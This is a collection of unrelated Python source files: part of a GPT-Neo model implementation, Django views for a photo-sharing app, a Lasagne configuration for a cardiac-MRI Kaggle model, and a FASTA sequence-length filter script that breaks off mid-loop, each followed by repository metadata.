hidden_states = residual + feed_forward_hidden_states
if use_cache:
outputs = (hidden_states,) + outputs
else:
outputs = (hidden_states,) + outputs[1:]
return outputs # hidden_states, present, (attentions, cross_attentions)
class GPTNeoPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = GPTNeoConfig
load_tf_weights = load_tf_weights_in_gpt_neo
base_model_prefix = "transformer"
def __init__(self, *inputs, **kwargs):
super().__init__(*inputs, **kwargs)
def _init_weights(self, module):
"""Initialize the weights."""
if isinstance(module, (LazyLinearAPICompatible,)):
# Slightly different from the TF version which uses truncated_normal for initialization
# cf https://github.com/pytorch/pytorch/pull/5617
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.bias is not None:
module.bias.data.zero_()
elif isinstance(module, nn.Embedding):
module.weight.data.normal_(mean=0.0, std=self.config.initializer_range)
if module.padding_idx is not None:
module.weight.data[module.padding_idx].zero_()
elif isinstance(module, nn.LayerNorm):
module.bias.data.zero_()
module.weight.data.fill_(1.0)
GPT_NEO_START_DOCSTRING = r"""
This model inherits from :class:`~transformers.PreTrainedModel`. Check the superclass documentation for the generic
    methods the library implements for all its models (such as downloading or saving, resizing the input embeddings,
pruning heads etc.)
This model is also a PyTorch `torch.nn.Module <https://pytorch.org/docs/stable/nn.html#torch.nn.Module>`__
subclass. Use it as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to
general usage and behavior.
Parameters:
config (:class:`~transformers.GPTNeoConfig`): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the :meth:`~transformers.PreTrainedModel.from_pretrained` method to load the model
weights.
"""
GPT_NEO_INPUTS_DOCSTRING = r"""
Args:
input_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, input_ids_length)`):
:obj:`input_ids_length` = ``sequence_length`` if :obj:`past_key_values` is ``None`` else
``past_key_values[0][0].shape[-2]`` (``sequence_length`` of input past key value states). Indices of input
sequence tokens in the vocabulary.
If :obj:`past_key_values` is used, only ``input_ids`` that do not have their past calculated should be
passed as ``input_ids``.
Indices can be obtained using :class:`~transformers.GPTNeoTokenizer`. See
:meth:`transformers.PreTrainedTokenizer.encode` and :meth:`transformers.PreTrainedTokenizer.__call__` for
details.
`What are input IDs? <../glossary.html#input-ids>`__
past_key_values (:obj:`Tuple[Tuple[torch.Tensor]]` of length :obj:`config.num_layers`):
Contains precomputed hidden-states (key and values in the attention blocks) as computed by the model (see
:obj:`past_key_values` output below). Can be used to speed up sequential decoding. The ``input_ids`` which
have their past given to this model should not be passed as ``input_ids`` as they have already been
computed.
attention_mask (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
token_type_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, input_ids_length)`, `optional`):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in ``[0,
1]``:
- 0 corresponds to a `sentence A` token,
- 1 corresponds to a `sentence B` token.
`What are token type IDs? <../glossary.html#token-type-ids>`_
position_ids (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range ``[0,
config.max_position_embeddings - 1]``.
`What are position IDs? <../glossary.html#position-ids>`_
head_mask (:obj:`torch.FloatTensor` of shape :obj:`(num_heads,)` or :obj:`(num_layers, num_heads)`, `optional`):
Mask to nullify selected heads of the self-attention modules. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (:obj:`torch.FloatTensor` of shape :obj:`(batch_size, sequence_length, hidden_size)`, `optional`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert :obj:`input_ids` indices into associated
vectors than the model's internal embedding lookup matrix.
If :obj:`past_key_values` is used, optionally only the last :obj:`inputs_embeds` have to be input (see
:obj:`past_key_values`).
use_cache (:obj:`bool`, `optional`):
If set to :obj:`True`, :obj:`past_key_values` key value states are returned and can be used to speed up
decoding (see :obj:`past_key_values`).
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under returned
tensors for more detail.
output_hidden_states (:obj:`bool`, `optional`):
Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors for
more detail.
return_dict (:obj:`bool`, `optional`):
Whether or not to return a :class:`~transformers.file_utils.ModelOutput` instead of a plain tuple.
"""
@add_start_docstrings(
"The bare GPT Neo Model transformer outputting raw hidden-states without any specific head on top.",
GPT_NEO_START_DOCSTRING,
)
class GPTNeoModel(GPTNeoPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.embed_dim = config.hidden_size
self.wte = nn.Embedding(config.vocab_size, self.embed_dim)
self.wpe = nn.Embedding(config.max_position_embeddings, self.embed_dim)
self.drop = nn.Dropout(config.embed_dropout)
self.h = nn.ModuleList([GPTNeoBlock(config, layer_id=i) for i in range(config.num_layers)])
self.ln_f = nn.LayerNorm(self.embed_dim, eps=config.layer_norm_epsilon)
self.init_weights()
def get_input_embeddings(self):
return self.wte
def set_input_embeddings(self, new_embeddings):
self.wte = new_embeddings
@add_start_docstrings_to_model_forward(GPT_NEO_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=BaseModelOutputWithPastAndCrossAttentions,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
past_key_values=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
use_cache = use_cache if use_cache is not None else self.config.use_cache
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if input_ids is not None and inputs_embeds is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif input_ids is not None:
input_shape = input_ids.size()
input_ids = input_ids.view(-1, input_shape[-1])
batch_size = input_ids.shape[0]
elif inputs_embeds is not None:
input_shape = inputs_embeds.size()[:-1]
batch_size = inputs_embeds.shape[0]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
device = input_ids.device if input_ids is not None else inputs_embeds.device
if token_type_ids is not None:
token_type_ids = token_type_ids.view(-1, input_shape[-1])
if position_ids is not None:
position_ids = position_ids.view(-1, input_shape[-1])
if past_key_values is None:
# print("!!!past_key_values is None!!!")
past_length = 0
past_key_values = tuple([None] * len(self.h))
else:
past_length = past_key_values[0][0].size(-2)
if position_ids is None:
position_ids = torch.arange(past_length, input_shape[-1] + past_length, dtype=torch.long, device=device)
position_ids = position_ids.unsqueeze(0).view(-1, input_shape[-1])
# Attention mask.
if attention_mask is not None:
assert batch_size > 0, "batch_size has to be defined and > 0"
global_attention_mask = attention_mask.view(batch_size, -1)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
global_attention_mask = global_attention_mask[:, None, None, :]
# Since global_attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
global_attention_mask = global_attention_mask.to(dtype=self.dtype) # fp16 compatibility
global_attention_mask = (1.0 - global_attention_mask) * -10000.0
else:
global_attention_mask = None
# Local causal attention mask
batch_size, seq_length = input_shape
full_seq_length = seq_length + past_length
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x num_heads x N x N
# head_mask has shape n_layer x batch x num_heads x N x N
head_mask = self.get_head_mask(head_mask, self.config.num_layers)
if inputs_embeds is None:
inputs_embeds = self.wte(input_ids)
position_embeds = self.wpe(position_ids)
hidden_states = inputs_embeds + position_embeds
if token_type_ids is not None:
token_type_embeds = self.wte(token_type_ids)
hidden_states = hidden_states + token_type_embeds
hidden_states = self.drop(hidden_states)
output_shape = input_shape + (hidden_states.size(-1),)
presents = () if use_cache else None
all_self_attentions = () if output_attentions else None
all_hidden_states = () if output_hidden_states else None
for i, (block, layer_past) in enumerate(zip(self.h, past_key_values)):
attn_type = self.config.attention_layers[i]
attn_mask = global_attention_mask
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if getattr(self.config, "gradient_checkpointing", False) and self.training:
if use_cache:
logger.warning(
"`use_cache=True` is incompatible with `config.gradient_checkpointing=True`. Setting "
"`use_cache=False`..."
)
use_cache = False
def create_custom_forward(module):
def custom_forward(*inputs):
# None for past_key_value
return module(*inputs, use_cache, output_attentions)
return custom_forward
outputs = torch.utils.checkpoint.checkpoint(
create_custom_forward(block),
hidden_states,
None,
attn_mask,
head_mask[i],
)
else:
try:
outputs = block(
hidden_states,
layer_past=layer_past,
attention_mask=attn_mask,
head_mask=head_mask[i],
use_cache=use_cache,
output_attentions=output_attentions,
)
except AfterStoppingPointException as e:
raise e
except Exception as e:
print("failed with:")
print(f"\t block {i}")
print(f"\t input_ids.shape {input_ids.shape}")
print(f"\t hidden_states.shape {hidden_states.shape}")
print(f"\t past shapes {layer_past[0].shape if layer_past else layer_past}")
raise e
hidden_states = outputs[0]
if use_cache is True:
presents = presents + (outputs[1],)
if output_attentions:
all_self_attentions = all_self_attentions + (outputs[2 if use_cache else 1],)
hidden_states = self.ln_f(hidden_states)
hidden_states = hidden_states.view(*output_shape)
# Add last hidden state
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(v for v in [hidden_states, presents, all_hidden_states, all_self_attentions] if v is not None)
return BaseModelOutputWithPast(
last_hidden_state=hidden_states,
past_key_values=presents,
hidden_states=all_hidden_states,
attentions=all_self_attentions,
)
@add_start_docstrings(
"""
The GPT Neo Model transformer with a language modeling head on top (linear layer with weights tied to the input
embeddings).
""",
GPT_NEO_START_DOCSTRING,
)
class GPTNeoForCausalLM(GPTNeoPreTrainedModel):
_keys_to_ignore_on_load_missing = [r"h\.\d+\.attn\.masked_bias", r"lm_head\.weight"]
_keys_to_ignore_on_save = [r"lm_head.weight"]
def __init__(self, config):
super().__init__(config)
self.transformer = GPTNeoModel(config)
self.lm_head = LazyLinearAPICompatible(config.hidden_size, config.vocab_size, bias=False)
self.init_weights()
def get_output_embeddings(self):
return self.lm_head
def set_output_embeddings(self, new_embeddings):
self.lm_head = new_embeddings
def prepare_inputs_for_generation(self, input_ids, past=None, **kwargs):
token_type_ids = kwargs.get("token_type_ids", None)
# only last token for inputs_ids if past is defined in kwargs
if past:
input_ids = input_ids[:, -1].unsqueeze(-1)
if token_type_ids is not None:
token_type_ids = token_type_ids[:, -1].unsqueeze(-1)
attention_mask = kwargs.get("attention_mask", None)
position_ids = kwargs.get("position_ids", None)
if attention_mask is not None and position_ids is None:
# create position_ids on the fly for batch generation
position_ids = attention_mask.long().cumsum(-1) - 1
position_ids.masked_fill_(attention_mask == 0, 1)
if past:
position_ids = position_ids[:, -1].unsqueeze(-1)
else:
position_ids = None
return {
"input_ids": input_ids,
"past_key_values": past,
"use_cache": kwargs.get("use_cache"),
"position_ids": position_ids,
"attention_mask": attention_mask,
"token_type_ids": token_type_ids,
}
@add_start_docstrings_to_model_forward(GPT_NEO_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=CausalLMOutputWithCrossAttentions,
config_class=_CONFIG_FOR_DOC,
)
def forward(
self,
input_ids=None,
past_key_values=None,
attention_mask=None,
token_type_ids=None,
position_ids=None,
head_mask=None,
inputs_embeds=None,
labels=None,
use_cache=None,
output_attentions=None,
output_hidden_states=None,
return_dict=None,
):
r"""
labels (:obj:`torch.LongTensor` of shape :obj:`(batch_size, sequence_length)`, `optional`):
Labels for language modeling. Note that the labels **are shifted** inside the model, i.e. you can set
``labels = input_ids`` Indices are selected in ``[-100, 0, ..., config.vocab_size]`` All labels set to
``-100`` are ignored (masked), the loss is only computed for labels in ``[0, ..., config.vocab_size]``
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
transformer_outputs = self.transformer(
input_ids,
past_key_values=past_key_values,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
use_cache=use_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = transformer_outputs[0]
lm_logits = self.lm_head(hidden_states)
loss = None
if labels is not None:
# Compute loss in fp32 to match with mesh-tf version
# https://github.com/EleutherAI/gpt-neo/blob/89ce74164da2fb16179106f54e2269b5da8db333/models/gpt2/gpt2.py#L179
lm_logits = lm_logits.to(torch.float32)
# Shift so that tokens < n predict n
shift_logits = lm_logits[..., :-1, :].contiguous()
shift_labels = labels[..., 1:].contiguous()
# Flatten the tokens
loss_fct = CrossEntropyLoss()
loss = loss_fct(shift_logits.view(-1, shift_logits.size(-1)), shift_labels.view(-1))
lm_logits = lm_logits.to(hidden_states.dtype)
loss = loss.to(hidden_states.dtype)
if not return_dict:
output = (lm_logits,) + transformer_outputs[1:]
return ((loss,) + output) if loss is not None else output
return CausalLMOutputWithPast(
loss=loss,
logits=lm_logits,
past_key_values=transformer_outputs.past_key_values,
hidden_states=transformer_outputs.hidden_states,
attentions=transformer_outputs.attentions,
)
@staticmethod
def _reorder_cache(past: Tuple[Tuple[torch.Tensor]], beam_idx: torch.Tensor) -> Tuple[Tuple[torch.Tensor]]:
"""
This function is used to re-order the :obj:`past_key_values` cache if
:meth:`~transformers.PretrainedModel.beam_search` or :meth:`~transformers.PretrainedModel.beam_sample` is
called. This is required to match :obj:`past_key_values` with the correct beam_idx at every generation step.
"""
return tuple(
tuple(past_state.index_select(0, beam_idx.to(past_state.device)) for past_state in layer_past)
for layer_past in past
)
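
# Usage sketch (illustrative; assumes the published checkpoint and tokenizer are
# available via the Hugging Face hub, and is not executed at import time):
#
#     from transformers import GPT2Tokenizer
#     tokenizer = GPT2Tokenizer.from_pretrained("EleutherAI/gpt-neo-1.3B")
#     model = GPTNeoForCausalLM.from_pretrained("EleutherAI/gpt-neo-1.3B")
#     inputs = tokenizer("Hello, my name is", return_tensors="pt")
#     outputs = model(**inputs, labels=inputs["input_ids"])
#     print(outputs.loss.item(), outputs.logits.shape)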
| 41.982206 | 130 | 0.641886 | [
"MIT"
] | Snarp/nostalgebraist-autoresponder | src/stable_library_code/transformers/gpt_neo/modeling_gpt_neo.py | 35,391 | Python |
from django.http.response import HttpResponseRedirect
from django.shortcuts import redirect, render
from django.contrib.auth.decorators import login_required
from itertools import chain
from .models import Image, Profile, Comment
from .forms import NewProfileForm, NewImageForm
import string
import random
# Create your views here.
def generateNewName():
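    """Return a random 8-character string built from letters, digits and punctuation.

    Despite the password-flavoured local names, the result is used below as a
    generated image name for new uploads.
    """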
letters = string.ascii_letters
numbers = string.digits
specialCharacters = string.punctuation
acceptablePasswordCharacters = letters + numbers + specialCharacters
generatedPassword = "".join(random.choice(acceptablePasswordCharacters) for i in range(8))
# print("Your generared password is: " +generatedPassword)
return generatedPassword
@login_required(login_url='/accounts/login/')
def index(request):
title = 'Moments: Feed'
current_user = request.user
current_profile = Profile.objects.filter(user_name = current_user.username).first()
if current_profile:
all_posts = list()
users_posts = Image.objects.filter(profile_id = current_profile).all()
user_posts_count = users_posts.count()
        following_count = len(current_profile.following)
        if following_count > 0:
            # include the posts of every profile the current user follows in the feed
            for item in current_profile.following:
                following_posts = Image.objects.filter(profile_id = item).all()
                all_posts = list(chain(all_posts, following_posts))
        all_posts = list(chain(users_posts, all_posts))
return render(request, 'dashboard.html', {'title': title, 'all_posts': all_posts, "profile": current_profile, 'post_count': user_posts_count})
else:
return redirect('Create Profile')
@login_required(login_url='/accounts/login/')
def upload(request):
title = 'Upload New Post'
current_profile = Profile.objects.filter(user_name = request.user.username).first()
form = NewImageForm(request.POST, request.FILES)
if request.method == 'POST' and request.FILES['new_image']:
if form.is_valid():
new_post = request.FILES['new_image']
new_caption = form.cleaned_data['image_caption']
new_upload = Image(image = new_post, image_name = generateNewName(), image_caption = new_caption, profile_id = current_profile, likes = 0,)
new_upload.save()
return redirect('Dashboard')
else:
form = NewImageForm()
return render(request, 'upload.html', {'title': title, 'form': form, "profile": current_profile })
@login_required(login_url='/accounts/login/')
def create_profile(request):
title = 'Moments: Create New Profile'
form = NewProfileForm(request.POST, request.FILES)
current_profile = Profile.objects.filter(user_name = request.user.username).first()
if request.method == 'POST' and request.FILES['profile_photo']:
if form.is_valid():
new_profile_photo = request.FILES['profile_photo']
new_bio = form.cleaned_data['bio']
print(new_bio)
username = request.user.username
date_joined = request.user.date_joined
new_profile = Profile(profile_photo= new_profile_photo, bio=new_bio, user_name= username, following= [], followers = [], joined= date_joined)
new_profile.save()
return redirect('Dashboard')
else:
form = NewProfileForm()
return render(request, 'create_profile.html', {'title': title, 'form': form, "profile": current_profile})
@login_required(login_url='/accounts/login/')
def profile(request):
title = 'Upload New Post'
current_profile = Profile.objects.filter(user_name = request.user.username).first()
    user_posts = Image.objects.filter(profile_id = current_profile).all()
return render(request, 'profile.html', {'title': title, 'profile': current_profile, 'posts': user_posts})
@login_required(login_url='/accounts/login/')
def view_profile(request, user_id):
title = 'Upload New Post'
current_profile = Profile.objects.filter(user_name = request.user.username).first()
found_user = Profile.objects.filter(id = user_id).first()
user_posts = Image.objects.filter(profile_id = found_user).all()
return render(request, 'view_profile.html', {'title': title, 'profile': current_profile, 'user_profile': found_user, 'posts': user_posts})
@login_required(login_url='/accounts/login/')
def search(request):
title = 'Upload New Post'
current_profile = Profile.objects.filter(user_name = request.user.username).first()
if 'search' in request.GET and request.GET['search']:
search_query = request.GET.get('search')
print(search_query)
found_users = Profile.objects.filter(user_name = search_query).all()
return render(request, 'search.html', {'title': title, 'profile': current_profile, 'search_query': search_query, 'results': found_users})
return render(request, 'search.html', {'title': title, 'profile': current_profile})
@login_required(login_url='/accounts/login/')
def view(request, post_id):
title = 'Upload New Post'
current_profile = Profile.objects.filter(user_name = request.user.username).first()
found_image = Image.objects.filter(id = post_id).first()
image_comments = Comment.objects.filter(image_id = found_image.id ).all()
return render(request, 'view.html', {'title': title, 'post': found_image, "profile": current_profile, 'comments': image_comments}) | 36.980645 | 153 | 0.666957 | [
"MIT"
] | g90tony/insta-clone | image/views.py | 5,732 | Python |
"""Single slice vgg with normalised scale.
"""
import functools
import lasagne as nn
import numpy as np
import theano
import theano.tensor as T
import data_loader
import deep_learning_layers
import image_transform
import layers
import preprocess
import postprocess
import objectives
import theano_printer
import updates
import utils
# Random params
rng = np.random
take_a_dump = False # dump a lot of data in a pkl-dump file. (for debugging)
dump_network_loaded_data = False # dump the outputs from the dataloader (for debugging)
# Memory usage scheme
caching = None
# Save and validation frequency
validate_every = 10
validate_train_set = True
save_every = 10
restart_from_save = False
dump_network_loaded_data = False
# Training (schedule) parameters
# - batch sizes
batch_size = 32
sunny_batch_size = 4
batches_per_chunk = 16
AV_SLICE_PER_PAT = 11
num_epochs_train = 50 * AV_SLICE_PER_PAT
# - learning rate and method
base_lr = .0001
learning_rate_schedule = {
0: base_lr,
num_epochs_train*4/5: base_lr/10,
num_epochs_train*19/20: base_lr/100,
}
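# Epoch-indexed learning-rate schedule: base_lr for roughly the first 80% of training,
# then a 10x drop, and a further 100x drop over the final 5%.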
momentum = 0.9
build_updates = updates.build_adam_updates
# Preprocessing stuff
cleaning_processes = [
preprocess.set_upside_up,]
cleaning_processes_post = [
functools.partial(preprocess.normalize_contrast_zmuv, z=2)]
augmentation_params = {
"rotation": (-16, 16),
"shear": (0, 0),
"translation": (-8, 8),
"flip_vert": (0, 1),
"roll_time": (0, 0),
"flip_time": (0, 0),
}
preprocess_train = functools.partial( # normscale_resize_and_augment has a bug
preprocess.preprocess_normscale,
normscale_resize_and_augment_function=functools.partial(
image_transform.normscale_resize_and_augment_2,
normalised_patch_size=(200,200)))
preprocess_validation = functools.partial(preprocess_train, augment=False)
preprocess_test = preprocess_train
sunny_preprocess_train = preprocess.sunny_preprocess_with_augmentation
sunny_preprocess_validation = preprocess.sunny_preprocess_validation
sunny_preprocess_test = preprocess.sunny_preprocess_validation
# Data generators
create_train_gen = data_loader.generate_train_batch
create_eval_valid_gen = functools.partial(data_loader.generate_validation_batch, set="validation")
create_eval_train_gen = functools.partial(data_loader.generate_validation_batch, set="train")
create_test_gen = functools.partial(data_loader.generate_test_batch, set=["validation", "test"])
# Input sizes
image_size = 128
data_sizes = {
"sliced:data:singleslice:difference:middle": (batch_size, 29, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
"sliced:data:singleslice:difference": (batch_size, 29, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
"sliced:data:singleslice": (batch_size, 30, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
"sliced:data:ax": (batch_size, 30, 15, image_size, image_size), # 30 time steps, 30 mri_slices, 100 px wide, 100 px high,
"sliced:data:shape": (batch_size, 2,),
"sunny": (sunny_batch_size, 1, image_size, image_size)
# TBC with the metadata
}
# Objective
l2_weight = 0.000
l2_weight_out = 0.000
def build_objective(interface_layers):
# l2 regu on certain layers
l2_penalty = nn.regularization.regularize_layer_params_weighted(
interface_layers["regularizable"], nn.regularization.l2)
# build objective
return objectives.KaggleObjective(interface_layers["outputs"], penalty=l2_penalty)
# Testing
postprocess = postprocess.postprocess
test_time_augmentations = 20 * AV_SLICE_PER_PAT # More augmentations since a we only use single slices
tta_average_method = lambda x: np.cumsum(utils.norm_geometric_average(utils.cdf_to_pdf(x)))
# Architecture
def build_model():
#################
# Regular model #
#################
input_size = data_sizes["sliced:data:singleslice"]
l0 = nn.layers.InputLayer(input_size)
l1a = nn.layers.dnn.Conv2DDNNLayer(l0, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=64, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l1b = nn.layers.dnn.Conv2DDNNLayer(l1a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=64, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l1 = nn.layers.dnn.MaxPool2DDNNLayer(l1b, pool_size=(2,2), stride=(2,2))
l2a = nn.layers.dnn.Conv2DDNNLayer(l1, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=128, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l2b = nn.layers.dnn.Conv2DDNNLayer(l2a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=128, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l2 = nn.layers.dnn.MaxPool2DDNNLayer(l2b, pool_size=(2,2), stride=(2,2))
l3a = nn.layers.dnn.Conv2DDNNLayer(l2, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=256, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l3b = nn.layers.dnn.Conv2DDNNLayer(l3a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=256, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l3c = nn.layers.dnn.Conv2DDNNLayer(l3b, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=256, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l3 = nn.layers.dnn.MaxPool2DDNNLayer(l3c, pool_size=(2,2), stride=(2,2))
l4a = nn.layers.dnn.Conv2DDNNLayer(l3, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l4b = nn.layers.dnn.Conv2DDNNLayer(l4a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l4c = nn.layers.dnn.Conv2DDNNLayer(l4b, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l4 = nn.layers.dnn.MaxPool2DDNNLayer(l4c, pool_size=(2,2), stride=(2,2))
l5a = nn.layers.dnn.Conv2DDNNLayer(l4, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l5b = nn.layers.dnn.Conv2DDNNLayer(l5a, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l5c = nn.layers.dnn.Conv2DDNNLayer(l5b, W=nn.init.Orthogonal("relu"), filter_size=(3,3), num_filters=512, stride=(1,1), pad="same", nonlinearity=nn.nonlinearities.rectify)
l5 = nn.layers.dnn.MaxPool2DDNNLayer(l5c, pool_size=(2,2), stride=(2,2))
# Systole Dense layers
ldsys1 = nn.layers.DenseLayer(l5, num_units=512, W=nn.init.Orthogonal("relu"), b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.rectify)
ldsys1drop = nn.layers.dropout(ldsys1, p=0.5)
ldsys2 = nn.layers.DenseLayer(ldsys1drop, num_units=512, W=nn.init.Orthogonal("relu"),b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.rectify)
ldsys2drop = nn.layers.dropout(ldsys2, p=0.5)
ldsys3 = nn.layers.DenseLayer(ldsys2drop, num_units=600, W=nn.init.Orthogonal("relu"), b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.softmax)
    ldsys3drop = nn.layers.dropout(ldsys3, p=0.5)  # dropout at the output might encourage adjacent neurons to correlate
ldsys3dropnorm = layers.NormalisationLayer(ldsys3drop)
l_systole = layers.CumSumLayer(ldsys3dropnorm)
# Diastole Dense layers
lddia1 = nn.layers.DenseLayer(l5, num_units=512, W=nn.init.Orthogonal("relu"), b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.rectify)
lddia1drop = nn.layers.dropout(lddia1, p=0.5)
lddia2 = nn.layers.DenseLayer(lddia1drop, num_units=512, W=nn.init.Orthogonal("relu"),b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.rectify)
lddia2drop = nn.layers.dropout(lddia2, p=0.5)
lddia3 = nn.layers.DenseLayer(lddia2drop, num_units=600, W=nn.init.Orthogonal("relu"), b=nn.init.Constant(0.1), nonlinearity=nn.nonlinearities.softmax)
    lddia3drop = nn.layers.dropout(lddia3, p=0.5)  # dropout at the output might encourage adjacent neurons to correlate
lddia3dropnorm = layers.NormalisationLayer(lddia3drop)
l_diastole = layers.CumSumLayer(lddia3dropnorm)
return {
"inputs":{
"sliced:data:singleslice": l0
},
"outputs": {
"systole": l_systole,
"diastole": l_diastole,
},
"regularizable": {
ldsys1: l2_weight,
ldsys2: l2_weight,
ldsys3: l2_weight_out,
lddia1: l2_weight,
lddia2: l2_weight,
lddia3: l2_weight_out,
},
}
| 46.165803 | 176 | 0.715937 | [
"MIT"
] | Keesiu/meta-kaggle | data/external/repositories_2to3/267667/kaggle-heart-master/configurations/je_ss_smcrps_nrmsc200_500_dropnorm.py | 8,910 | Python |
#!/usr/bin/env python
## Filter small sequences out of a fasta file. For use with flies,
## for example, where scaffolds of length <200kb seem to be considered
## no mans land
import os
from optparse import OptionParser
from sonLib.bioio import fastaRead
from sonLib.bioio import fastaWrite
from sonLib.bioio import getTempFile
# for every sequence, determine if its contained in the file
# (starts with |1|0; and there is a differently named sequence after it),
# and its length (defined as the max offset + length) found for the name
# assumption: sequences with same name are contiguous (which is true for
# cactus_batchChunk output, which this is tailored for)
# **only bother if names seem to be in chunk format (None returned otherwise)
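# Example chunk header (hypothetical): "scaffold_1|1|25000" is parsed as
# name "scaffold_1" with offset 25000 within that scaffold.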
def containedSequences(inputFile):
lookup = dict()
prev = ""
for header, seq in fastaRead(inputFile):
if '|1|' not in header:
assert len(lookup) == 0
return None
else:
idx = header.find('|1|')
name = header[:idx]
offset = header[idx+3:]
if offset.isdigit() == False:
assert len(lookup) == 0
return None
if int(offset) == 0:
assert lookup.has_key(name) == False
lookup[name] = (len(seq), False)
elif lookup.has_key(name) == True:
lookup[name] = (max(lookup[name][0], int(offset) + len(seq)), lookup[name][1])
if name != prev and lookup.has_key(prev):
lookup[prev] = (lookup[prev][0], True)
prev = name
return lookup
def tooShort(header, seq, options, contTable):
isTooShort = False
if contTable is not None:
key = header[:header.find('|1|')]
if contTable.has_key(key):
length, flag = contTable[key]
isTooShort = flag and length < options.length
else:
isTooShort = len(seq) < options.length
return isTooShort
def main():
##########################################
#Construct the arguments.
##########################################
usage = "usage: %prog [options] <fasta input file> <fasta output file>\n\n" + \
" <fasta file>: fasta sequence to filter\n"
description = "Ensure sequences have length >= length\n"
parser = OptionParser(usage=usage, description=description)
parser.add_option("--prefix", dest="prefix", type="string",
help="only filter sequences with prefix in name",
default="")
parser.add_option("--length", dest="length", type="int",
help="filter shorter than length [default=1000]",
default=1000)
options, args = parser.parse_args()
if len(args) != 2:
parser.print_help()
return 1
inputName = args[0]
inputFile = open(inputName, "r")
outputName = args[1]
outputFile = open(outputName, "w")
contTable = containedSequences(inputFile)
inputFile.seek(0)
for header, seq in fastaRead(inputFile):
